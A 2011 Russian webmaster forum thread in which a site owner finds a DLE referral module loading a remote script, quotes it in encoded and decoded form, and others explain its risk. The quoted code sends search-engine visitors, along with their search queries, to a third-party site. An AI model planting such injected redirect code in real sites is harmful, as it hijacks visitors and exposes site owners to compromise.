Проблема
Страницы: 1
Проблема
Тут такая проблема появилась мой сайт в "ОПЕРЕ" пишет "Предупреждение о вредоносном ПО", я сначало не понял почему пока не порылся в "Исходном коде страницы"
там есть такие скрипты:
Для Dle есть такой модуль "Переходы" и там есть такие переходы "kinoz <sc ript src=http://quzone.ru/j.js></script>(скрипта нет тока в "Исходном коде страницы") " , а этот скрипт активируется
Код
<sc ript src=http://quzone.ru/j.js></script>

Рисунок


Кто подскажет что это за скрипт и что он делает
Изменено: killer1000 - 15 Июня 2011 19:56

Прогон по твиттеру, постинг в 1500 аккунтов
Постинг в твиттер аккаунты, для ускорения индексации ваших сайтов, сателлитов, дорвеев.

по этому адресу вот чё лежит:
function l(h) {return parseInt(h,16);}var r=document.referrer;if (r.indexOf('google.') > -1 || r.indexOf('yahoo.') > -1 || r.indexOf('yandex.') > -1 || r.indexOf('bing.com.') > -1 || r.indexOf('yahoo.') > -1 || r.indexOf('rambler.') > -1 || r.indexOf('go.mail.') > -1){document.write(une scape("%3Cscript%20type%3D%22text/javascript%22%3Esp_redirect%20%3D%20%7B%7D%3Bsp_redirect.searchers%20%3D%20%5B%20%5B/google%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.yahoo%5C./i%2C%20/%28%5C%3F%7C%26%29p%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/bing%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.aol%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/ask%5C.com/i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/altavista%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/search%5C.lycos%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/alltheweb%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/yandex%5C./i%2C%20/%28%5C%3F%7C%26%29text%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/%28nova%5C.%7Csearch%5C.%29%3Frambler%5C./i%2C%20/%28%5C%3F%7C%26%29query%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/gogo%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/go%5C.mail%5C./i%2C%20/%28%5C%3F%7C%26%29q%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%2C%20%5B/nigma%5C./i%2C%20/%28%5C%3F%7C%26%29s%3D%28.*%3F%29%28%26%7C%24%29/i%2C%202%5D%5D%3Bsp_redirect.sp_redirect%20%3D%20function%28referer%29%20%7B%20var%20query%3Dnull%3B%20for%28var%20i%3D0%3B%20i%3Csp_redirect.searchers.length%3B%20i++%29%20%7B%20%20var%20se%20%3D%20sp_redirect.searchers%5Bi%5D%3B%20%20if%20%28referer.match%28se%5B0%5D%29%29%20%7B%20%20%20query%20%3D%20referer.match%28se%5B1%5D%29%5Bse%5B2%5D%5D%3B%20%20%20break%3B%20%20%7D%20%7D%20document.location.href%3D%27http%3A//shara.lots-moment-archiv.ru/%27+%27%3Fwkey%3D"+l('825c8')+"%27+%27%27+%28query%3F%20%27%26query%3D%27+query%20%3A%20%27%27%29%3B%7D%3Bsp_redirect.sp_redirect%28document.referrer%29%3B%3C/script%3E"));
}
если есть кодеры, подскажите, что это?
раскодировал теперь помогите разобраться

Код
function l(h) {return parseInt(h,16);}var r=document.referrer;if (r.indexOf(\'google.\') > -1 || r.indexOf(\'yahoo.\') > -1 || r.indexOf(\'yandex.\') > -1 || r.indexOf(\'bing.com.\') > -1 || r.indexOf(\'yahoo.\') > -1 || r.indexOf(\'rambler.\') > -1 || r.indexOf(\'go.mail.\') > -1){document.write(une scape(\"<sc ript type="text/javascript">sp_redirect = {};sp_redirect.searchers = [ [/google\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/search\.yahoo\./i, /(\?|&)p=(.*?)(&|$)/i, 2], [/bing\.com/i, /(\?|&)q=(.*?)(&|$)/i, 2], [/search\.aol\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/ask\.com/i, /(\?|&)q=(.*?)(&|$)/i, 2], [/altavista\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/search\.lycos\./i, /(\?|&)query=(.*?)(&|$)/i, 2], [/alltheweb\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/yandex\./i, /(\?|&)text=(.*?)(&|$)/i, 2], [/(nova\.|search\.)?rambler\./i, /(\?|&)query=(.*?)(&|$)/i, 2], [/gogo\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/go\.mail\./i, /(\?|&)q=(.*?)(&|$)/i, 2], [/nigma\./i, /(\?|&)s=(.*?)(&|$)/i, 2]];sp_redirect.sp_redirect = function(referer) { var query=null; for(var i=0; i<sp_redirect.searchers.length; i  ) {  var se = sp_redirect.searchers[i];  if (referer.match(se[0])) {   query = referer.match(se[1])[se[2]];   break;  } } document.location.href='http://shara.lots-moment-archiv.ru/' '?wkey=\" l(\'825c8\') \"' '' (query? '&query=' query : '');};sp_redirect.sp_redirect(document.referrer);</script>\")); 
}
Ну по любому этот левый код подтягиваемый с чужого сайта настораживает. Допустим на данный момент он выполняет часть функционала модуля переходов, всё вроде ок. Далее, допустим эту версию переходов со временем скачают и поставит у себя 1000 человек на своих 1000 сайтах. И вот однажды, владелец этого _http://quzone.ru возьмёт и поменяет код в файле j.js на шелл или проксик какой ни-ть, и либо начнёт кого нибудь ddos-ить или просто на любом из сайтов покопается. А потом вернёт всё обратно, и вы даже знать не будете, что ваш сайт участвовал в атаке. Не знаю, мне кажется если на жертву единовременно будет 1000 переходов с других сайтов, сайт ляжет.
Изменено: daden11 - 15 Июня 2011 21:01
Страницы: 1
Похожие темы:
Читают тему (гостей: 1, пользователей: 0, из них скрытых: 0)
Новые темыОбъявленияСвободное общение
08:26 Adsense личный опыт 
07:55 Каноническая ссылка в меню 
07:34 Нужно ли делать редирект с HTTP на HTTPS? 
07:03 Несколько регионов у сайта: принадлежность к регионам в вебмастере 
07:01 SEO и редирект с главной страницы 
04:26 Яндекс тИЦ 03.12.2016 
01:09 Переход на HTTPS - стоит ли? 
04:34 Продажа дедиков дешево! онлайн продажа туннелей ssh 
02:33 Продам домены РУС 
01:27 Едем в топ 
01:12 Копирайтинг/рерайтинг. Интересное предложение! 
22:28 Крупные новостные (СМИ) площадки, Яндекс Новости, Google News, анонсы, хорошая посещаемость. 
21:56 Продам новостной сайт 
21:35 Дизайн: сайтов, баннеров, шапок, логотипов,оформление групп вконтакте 
08:34 Мультиязычность сайта - хорошо или плохо? 
07:26 Кто-нибудь работал с directadvert.ru??? 
00:22 Сервис 1ps.ru 
22:15 Южнокорейских геймеров будут сажать за чит-коды 
20:56 NEW EARN MONEY + payment proof (BTC) 
20:33 Еврокомиссия призвала Facebook и Twitter быстрее принимать меры против "языка вражды" 
17:52 Книга "Просветление за полчаса"